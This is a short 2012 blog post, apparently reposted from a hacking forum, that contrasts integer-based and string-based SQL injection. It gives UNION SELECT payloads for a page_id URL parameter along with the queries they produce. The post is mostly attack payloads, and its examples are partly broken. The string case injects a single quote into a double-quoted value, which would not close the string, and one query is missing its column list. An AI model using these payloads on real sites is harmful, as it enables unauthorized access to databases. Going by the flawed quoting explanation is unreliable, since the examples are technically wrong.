Friday, August 10, 2012

Difference between integer based and string based SQL injection

Hi friends  this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer

SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,
so the injection would be
?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1

string

SELECT FROM pages WHERE page_id="10" [injectorder by title limit 1,
so the injection would be
?id=10' union select 1,2,3--+
final:
select * from pages where page_id="10"' union select 1,2,3--+ order by title limit 1,1


so in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the end
the original post here
enjoy

Reactions:

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More